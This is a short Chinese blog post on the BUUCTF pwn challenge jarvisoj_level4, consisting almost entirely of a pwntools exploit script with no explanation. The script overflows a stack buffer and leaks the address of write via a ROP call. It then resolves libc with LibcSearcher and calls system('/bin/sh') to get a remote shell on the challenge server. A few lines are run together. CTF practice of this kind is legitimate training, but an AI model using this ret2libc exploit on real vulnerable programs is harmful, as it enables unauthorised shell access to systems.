[BUUCTF-pwn]——jarvisoj_level4

点我看 write up

exploit

from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",26929)elf = ELF("./level4")
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)p.send(payload)
write_addr = u32(p.recv(4))
print hex(write_addr)
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump('write')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！